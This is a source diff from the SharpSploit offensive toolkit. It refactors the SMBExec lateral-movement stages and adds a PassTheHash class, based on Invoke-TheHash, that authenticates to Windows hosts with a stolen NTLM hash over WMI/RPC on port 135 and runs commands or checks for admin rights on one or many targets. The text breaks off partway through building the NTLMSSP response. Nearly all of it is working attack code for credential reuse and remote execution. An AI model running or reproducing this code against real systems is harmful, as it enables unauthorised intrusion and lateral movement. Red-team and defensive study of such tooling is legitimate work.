                                     }
                                     break;
 
                                 case "CloseServiceHandle":
                                     {
-                                        OrderedDictionary packet_SCM_data;
-                                        if (SMB_close_service_handle_stage == 1)
+                                         if (SMB_Close_Service_Handle_Stage == 1)
                                         {
-                                            Console.WriteLine("Service {0} deleted on {1}", SMB_service, target);
-                                            SMB2_message_ID += 20;
-                                            SMB_close_service_handle_stage++;
-                                            packet_SCM_data = SMBExec.SCMCloseServiceHandle(SMB_service_context_handle);
+                                            Console.WriteLine("Service {0} deleted on {1}", SMB_Service, Target);
+                                            Service_Deleted = true;
+                                            SMB2_Message_ID += 20;
+                                            SMB_Close_Service_Handle_Stage++;
+                                            Packet_SCM_Data = SMBExec.SCMCloseServiceHandle(SMB_Service_Context_Handle);
                                         }
                                         else
                                         {
-                                            SMB2_message_ID++;
+                                            SMB2_Message_ID++;
                                             SMBClientStage = "CloseRequest";
-                                            packet_SCM_data = SMBExec.SCMCloseServiceHandle(SMB_service_manager_context_handle);
+                                            Packet_SCM_Data = SMBExec.SCMCloseServiceHandle(SMB_Service_Manager_Context_Handle);
                                         }
-                                        if (SMB_signing)
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                            Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
                                         }
 
-                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
-                                        SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
-                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
-                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length + SCM_data.Length);
-                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                                        int RPC_data_length = SMB2_data.Length + SCM_data.Length + RPC_data.Length;
-                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
-                                        if (SMB_signing)
+                                        Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                        Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
+                                        Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
+                                        RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                        Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
+                                        SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                        SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                                        int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
+                                        if (SMB_Signing)
                                         {
-                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            HMAC_SHA256 = new HMACSHA256();
+                                            SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                            SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
-                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
-                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
 
                                     }
                                     break;
                                 case "CloseRequest":
                                     {
-                                        SMB2_message_ID += 20;
-                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x06, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
-                                        if (SMB_signing)
+                                        SMB2_Message_ID += 20;
+                                        Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x06, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                        Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                            Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
                                         }
 
-                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2CloseRequest(SMB_file_ID);
-                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
-                                        if (SMB_signing)
+                                        SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                        SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
+                                        if (SMB_Signing)
                                         {
-                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).ToArray();
-                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            HMAC_SHA256 = new HMACSHA256();
+                                            SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
+                                            SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
-                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
-                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "TreeDisconnect";
                                     }
                                     break;
 
                                 case "TreeDisconnect":
                                     {
-                                        SMB2_message_ID++;
-                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x04, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
-                                        if (SMB_signing)
+                                        SMB2_Message_ID++;
+                                        Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x04, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                        Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                            Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
                                         }
-                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2TreeDisconnectRequest();
-                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
-                                        if (SMB_signing)
+                                        Packet_SMB2_Data = SMBExec.SMB2TreeDisconnectRequest();
+                                        SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                        SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
+                                        if (SMB_Signing)
                                         {
-                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).ToArray();
-                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            HMAC_SHA256 = new HMACSHA256();
+                                            SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
+                                            SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
-                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
-                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "Logoff";
                                     }
                                     break;
                                 case "Logoff":
                                     {
-                                        SMB2_message_ID += 20;
-                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x02, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
-                                        if (SMB_signing)
+                                        SMB2_Message_ID += 20;
+                                        Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x02, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                        Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                            Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
                                         }
-                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2SessionLogoffRequest();
-                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
-                                        if (SMB_signing)
+                                        Packet_SMB2_Data = SMBExec.SMB2SessionLogoffRequest();
+                                        SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                        SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
+                                        if (SMB_Signing)
                                         {
-                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).ToArray();
-                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            HMAC_SHA256 = new HMACSHA256();
+                                            SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
+                                            
+                                            SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
-                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
-                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "exit";
                                     }
                                     break;
                             }
                         }
                     }
-
+                    if (!Service_Deleted)
+                    {
+                        output.AppendLine("Warning: Service not deleted. Please delete Service \"" + SMB_Service + "\" manually.");
+                    }
                 }
                 SMBClient.Close();
                 SMBClientStream.Close();
             }
-
 
             return output.ToString();
         }
@@ -2725,6 +2698,14 @@ namespace SharpSploit.LateralMovement
             stream.Flush();
             stream.Read(BytesReceived, 0, BytesReceived.Length);
             return BytesReceived;
+        }
+
+        private static byte[] GetNetBIOSSessionService(int SMB_Header_Length, int RPC_Data_Length)
+        {
+            OrderedDictionary Packet_NetBIOS_Session_Service = SMBExec.NetBIOSSessionService(SMB_Header_Length, RPC_Data_Length);
+            byte[] NetBIOS_Session_Service = Utilities.ConvertFromPacketOrderedDictionary(Packet_NetBIOS_Session_Service);
+            return NetBIOS_Session_Service;
+
         }
     }
 }

--- a/SharpSploit/LateralMovement/PassTheHash.cs
+++ b/SharpSploit/LateralMovement/PassTheHash.cs
@@ -1,0 +1,2809 @@
+﻿using System;
+using System.Collections.Generic;
+using System.Collections.Specialized;
+using System.Diagnostics;
+using System.Linq;
+using System.Net;
+using System.Net.Sockets;
+using System.Security.Cryptography;
+using System.Text;
+using System.Threading;
+using SharpSploit.Execution;
+using SharpSploit.Misc;
+
+namespace SharpSploit.LateralMovement
+{
+    public class PassTheHash
+    {
+        /// <summary>
+        /// Determines if a username and hash has administrative privilege on a target
+        /// </summary>
+        /// <param name="username">The Username to query.</param>
+        /// <param name="hash">The NTLM hash for the user</param>
+        /// <param name="domain">The logon domain for the user</param>
+        /// <param name="target">The target to query.</param>
+        /// <returns>True for Admin, False for not.</returns>
+        /// <author>Scottie Austin (@checkymander)</author>
+        /// <remarks>
+        /// Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
+        /// at https://github.com/Kevin-Robertson/Invoke-TheHash)
+        /// </remarks>
+        public static bool WMIAdminCheck(string username, string hash, string domain, string target)
+        {
+            string result = WMIExecute(username, hash, domain, target, AdminCheck: true);
+            if (result.Contains(" is a local administrator on "))
+                return true;
+            else
+                return false;
+        }
+
+        /// <summary>
+        /// Execute a command against multiple targets using Pass the Hash and WMI
+        /// </summary>
+        /// <param name="username">The username to log on as.</param>
+        /// <param name="hash">The NTLM hash for the user.</param>
+        /// <param name="domain">The logon domain for the user.</param>
+        /// <param name="targets">The target computers to run the command on.</param>
+        /// <param name="command">The Command to execute on the target</param>
+        /// <param name="sleep">Sleeptime between actions. Set this if getting unknown failures. (default=15). </param>
+        /// <param name="AdminCheck">Check if user is an Admin on the target only.</param>
+        /// <param name="debug">Include debug information in the output</param>
+        /// <returns>Returns a string containing execution results.</returns>
+        /// <author>Scottie Austin (@checkymander)</author>
+        /// <remarks>
+        /// Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
+        /// at https://github.com/Kevin-Robertson/Invoke-TheHash)
+        /// </remarks>
+        public static string WMIExecute(string username, string hash, string domain, List<string> targets, string command = "", int sleep = 15, bool AdminCheck = false, bool debug = false)
+        {
+            StringBuilder sb = new StringBuilder();
+            foreach (var target in targets)
+            {
+                sb.AppendLine(WMIExecute(username, hash, domain, target, command, sleep, AdminCheck, debug));
+            }
+
+            return sb.ToString();
+        }
+
+        /// <summary>
+        /// Execute a command against a target using Pass the Hash and WMI
+        /// </summary>
+        /// <param name="username">The username to log on as.</param>
+        /// <param name="hash">The NTLM hash for the user.</param>
+        /// <param name="domain">The logon domain for the user.</param>
+        /// <param name="target">The target computers to run the command on.</param>
+        /// <param name="command">The Command to execute on the target.</param>
+        /// <param name="sleep">Sleeptime between actions. Set this if getting unknown failures. (default=15). </param>
+        /// <param name="AdminCheck">Check if user is an Admin on the target only.</param>
+        /// <param name="debug">Include debug information in the output.</param>
+        /// <returns>Returns a string containing execution results.</returns>
+        /// <author>Scottie Austin (@checkymander)</author>
+        /// <remarks>
+        /// Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
+        /// at https://github.com/Kevin-Robertson/Invoke-TheHash)
+        /// </remarks>
+        public static string WMIExecute(string username, string hash, string domain, string target, string command = "", int sleep = 15, bool AdminCheck = false, bool debug = false)
+        {
+            //Change this name
+            string target_short = String.Empty;
+            string processID = BitConverter.ToString(BitConverter.GetBytes(Process.GetCurrentProcess().Id)).Replace("-00-00", "").Replace("-", "");
+            string auth_hostname = Environment.MachineName;
+            string output_username = String.Empty;
+            string WMI_random_port_string = null;
+            string target_long = String.Empty;
+            string WMI_client_stage = String.Empty;
+            string WMI_data = String.Empty;
+            string OXID = String.Empty;
+            StringBuilder output = new StringBuilder();
+            //Change this name
+            int request_split_stage = 0;
+            int request_length = 0;
+            int sequence_number_counter = 0;
+            int request_split_index_tracker = 0;
+            int request_auth_padding = 0;
+            int OXID_index = 0;
+            int OXID_bytes_index = 0;
+            int WMI_random_port_int = 0;
+            int target_process_id = 0;
+            bool success = false;
+            IPAddress target_type = null;
+            byte[] object_UUID = null;
+            byte[] IPID = null;
+            byte[] WMI_client_send;
+            byte[] object_UUID2 = null;
+            byte[] sequence_number = null;
+            byte[] request_flags = null;
+            byte[] process_ID_Bytes = Utilities.ConvertStringToByteArray(processID);
+            byte[] request_call_ID = null;
+            byte[] request_opnum = null;
+            byte[] request_UUID = null;
+            byte[] request_context_ID = null;
+            byte[] alter_context_call_ID = null;
+            byte[] alter_context_context_ID = null;
+            byte[] alter_context_UUID = null;
+            byte[] hostname_length = null;
+            byte[] stub_data = null;
+            byte[] WMI_namespace_length = null;
+            byte[] WMI_namespace_unicode = null;
+            byte[] IPID2 = null;
+
+            if (!string.IsNullOrEmpty(hash) && !string.IsNullOrEmpty(username))
+            {
+                if (hash.Contains(":"))
+                    hash = hash.Split(':').Last();
+            }
+            else
+            {
+                return "Missing Required Parameters";
+            }
+
+
+            if (!string.IsNullOrEmpty(domain))
+                output_username = domain + '\\' + username;
+            else
+                output_username = username;
+
+            if (target == "localhost")
+            {
+                target = "127.0.0.1";
+                target_long = "127.0.0.1";
+            }
+
+            try
+            {
+                if (debug) { output.AppendLine(String.Format("Connecting to: {0}", target)); }
+                target_type = IPAddress.Parse(target);
+                target_short = target_long = target;
+            }
+            catch
+            {
+                target_long = target;
+
+                if (target.Contains("."))
+                {
+                    int target_short_index = target.IndexOf(".");
+                    target_short = target.Substring(0, target_short_index);
+                }
+                else
+                {
+                    target_short = target;
+                }
+            }
+
+            var WMI_client = new TcpClient();
+
+            try
+            {
+                WMI_client.Connect(target, 135);
+            }
+            catch
+            {
+                return "No Response from: " + target;
+            }
+
+            if (WMI_client.Connected)
+            {
+                if (debug) { output.AppendLine(String.Format("Connected to: {0}", target)); }
+                //Get Stream for WMI Client Connection
+                NetworkStream WMI_client_stream = WMI_client.GetStream();
+                byte[] WMI_client_receive = new byte[2048];
+                byte[] RPC_UUID = new byte[] { 0xc4, 0xfe, 0xfc, 0x99, 0x60, 0x52, 0x1b, 0x10, 0xbb, 0xcb, 0x00, 0xaa, 0x00, 0x21, 0x34, 0x7a };
+                OrderedDictionary packet_RPC = WMIExec.RPCBind(2, new byte[] { 0xd0, 0x16 }, new byte[] { 0x02 }, new byte[] { 0x00, 0x00 }, RPC_UUID, new byte[] { 0x00, 0x00 });
+                packet_RPC["RPCBind_FragLength"] = new byte[] { 0x74, 0x00 };
+                WMI_client_receive = SendStream(WMI_client_stream, Utilities.ConvertFromPacketOrderedDictionary(packet_RPC));
+                byte[] assoc_group = Utilities.GetByteRange(WMI_client_receive, 20, 23);
+                packet_RPC = WMIExec.RPCRequest(new byte[] { 0x03 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x05, 0x00 }, null);
+                WMI_client_receive = SendStream(WMI_client_stream, Utilities.ConvertFromPacketOrderedDictionary(packet_RPC));
+                string WMI_hostname = BitConverter.ToString(Utilities.GetByteRange(WMI_client_receive, 42, WMI_client_receive.Length));
+                byte[] WMI_hostname_bytes = Utilities.ConvertStringToByteArray(WMI_hostname.Substring(0, WMI_hostname.IndexOf("-00-00-00")).Replace("-00", "").Replace("-", "").Replace(" ", ""));
+                WMI_hostname_bytes = Utilities.GetByteRange(WMI_hostname_bytes, 0, WMI_hostname_bytes.Length);
+                WMI_hostname = Encoding.ASCII.GetString(WMI_hostname_bytes);
+                if (target_short != WMI_hostname)
+                {
+                    if (debug) { output.AppendLine(String.Format("Switching target name to {0} due to initial response.", WMI_hostname)); }
+                    target_short = WMI_hostname;
+                }
+                WMI_client.Close();
+                WMI_client_stream.Close();
+                WMI_client = new TcpClient();
+                WMI_client.ReceiveTimeout = 30000;
+
+                try
+                {
+                    WMI_client.Connect(target_long, 135);
+                }
+                catch
+                {
+                    output.AppendLine(String.Format("No response from {0}", target));
+                    return output.ToString();
+                }
+
+                if (WMI_client.Connected)
+                {
+                    if (debug) { output.AppendLine(String.Format("ReConnected to: {0} ", target)); }
+                    if (debug) { output.AppendLine("Authenticating"); }
+                    WMI_client_stream = WMI_client.GetStream();
+                    RPC_UUID = new byte[] { 0xa0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 };
+                    packet_RPC = WMIExec.RPCBind(3, new byte[] { 0xd0, 0x16 }, new byte[] { 0x01 }, new byte[] { 0x01, 0x00 }, RPC_UUID, new byte[] { 0x00, 0x00 });
+                    packet_RPC["RPCBind_FragLength"] = new byte[] { 0x78, 0x00 };
+                    packet_RPC["RPCBind_AuthLength"] = new byte[] { 0x28, 0x00 };
+                    packet_RPC["RPCBind_NegotiateFlags"] = new byte[] { 0x07, 0x82, 0x08, 0xa2 };
+                    WMI_client_receive = SendStream(WMI_client_stream, Utilities.ConvertFromPacketOrderedDictionary(packet_RPC));
+                    assoc_group = Utilities.GetByteRange(WMI_client_receive, 20, 23);
+                    string WMI_NTLMSSP = BitConverter.ToString(WMI_client_receive).Replace("-", "");
+                    int WMI_NTLMSSP_index = WMI_NTLMSSP.IndexOf("4E544C4D53535000");
+                    int WMI_NTLMSSP_bytes_index = WMI_NTLMSSP_index / 2;
+                    int WMI_domain_length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 12, WMI_client_receive);
+                    int WMI_target_length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 40, WMI_client_receive);
+                    byte[] WMI_session_ID = Utilities.GetByteRange(WMI_client_receive, 44, 51);
+                    byte[] WMI_NTLM_challenge = Utilities.GetByteRange(WMI_client_receive, WMI_NTLMSSP_bytes_index + 24, WMI_NTLMSSP_bytes_index + 31);
+                    byte[] WMI_target_details = Utilities.GetByteRange(WMI_client_receive, WMI_NTLMSSP_bytes_index + 56 + WMI_domain_length, WMI_NTLMSSP_bytes_index + 55 + WMI_domain_length + WMI_target_length);
+                    byte[] WMI_target_time_bytes = Utilities.GetByteRange(WMI_target_details, WMI_target_details.Length - 12, WMI_target_details.Length - 5);
+                    StringBuilder sb = new StringBuilder();
+                    for (int i = 0; i < hash.Length - 1; i += 2) { sb.Append(hash.Substring(i, 2) + "-"); };
+                    byte[] NTLM_hash_bytes = (Utilities.ConvertStringToByteArray(hash.Replace("-", "")));
+                    string[] hash_string_array = sb.ToString().Split('-');
+                    byte[] auth_hostname_bytes = Encoding.Unicode.GetBytes(auth_hostname);
+                    byte[] auth_domain_bytes = Encoding.Unicode.GetBytes(domain);
+                    byte[] auth_username_bytes = Encoding.Unicode.GetBytes(username);
+                    byte[] auth_domain_length = BitConverter.GetBytes(auth_domain_bytes.Length);
+                    auth_domain_length = new byte[] { auth_domain_length[0], auth_domain_length[1] };
+                    byte[] auth_username_length = BitConverter.GetBytes(auth_username_bytes.Length);
+                    auth_username_length = new byte[] { auth_username_length[0], auth_username_length[1] };
+                    byte[] auth_hostname_length = BitConverter.GetBytes(auth_hostname_bytes.Length);
+                    auth_hostname_length = new byte[] { auth_hostname_length[0], auth_hostname_length[1] };
+                    byte[] auth_domain_offset = new byte[] { 0x40, 0x00, 0x00, 0x00 };
+                    byte[] auth_username_offset = BitConverter.GetBytes(auth_domain_bytes.Length + 64);
+                    byte[] auth_hostname_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + 64);
+                    byte[] auth_LM_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + 64);
+                    byte[] auth_NTLM_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + 88);
+                    HMACMD5 HMAC_MD5 = new HMACMD5();
+                    HMAC_MD5.Key = NTLM_hash_bytes;
+                    string username_and_target = username.ToUpper();
+                    byte[] username_bytes = Encoding.Unicode.GetBytes(username_and_target);
+                    byte[] username_and_target_bytes = null;
+                    username_and_target_bytes = Utilities.CombineByteArray(username_bytes, auth_domain_bytes);
+                    byte[] NTLMv2_hash = HMAC_MD5.ComputeHash(username_and_target_bytes);
+                    Random r = new Random();
+                    byte[] client_challenge_bytes = new byte[8];
+                    r.NextBytes(client_challenge_bytes);
+                    byte[] security_blob_bytes = null;
+                    security_blob_bytes = Utilities.CombineByteArray(new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, WMI_target_time_bytes);
+                    security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, client_challenge_bytes);
+                    security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                    security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, WMI_target_details);
+                    security_blob_bytes = Utilities.CombineByteArray(security_blob_bytes, new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                    byte[] server_challenge_and_security_blob_bytes = Utilities.CombineByteArray(WMI_NTLM_challenge, security_blob_bytes);
+                    HMAC_MD5.Key = NTLMv2_hash;
+                    byte[] NTLMv2_response = HMAC_MD5.ComputeHash(server_challenge_and_security_blob_bytes);
+                    byte[] session_base_key = HMAC_MD5.ComputeHash(NTLMv2_response);
+                    NTLMv2_response = Utilities.CombineByteArray(NTLMv2_response, security_blob_bytes);
+                    byte[] NTLMv2_response_length = BitConverter.GetBytes(NTLMv2_response.Length);
+                    NTLMv2_response_length = new byte[] { NTLMv2_response_length[0], NTLMv2_response_length[1] };
+                    byte[] WMI_session_key_offset = BitConverter.GetBytes(auth_domain_bytes.Length + auth_username_bytes.Length + auth_hostname_bytes.Length + NTLMv2_response.Length + 88);
+                    byte[] WMI_session_key_length = new byte[] { 0x00, 0x00 };
+                    byte[] WMI_negotiate_flags = new byte[] { 0x15, 0x82, 0x88, 0xa2 };
+                    byte[] NTLMSSP_response = null;
+                    NTLMSSP_response = Utilities.CombineByteArray(new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 }, auth_LM_offset);
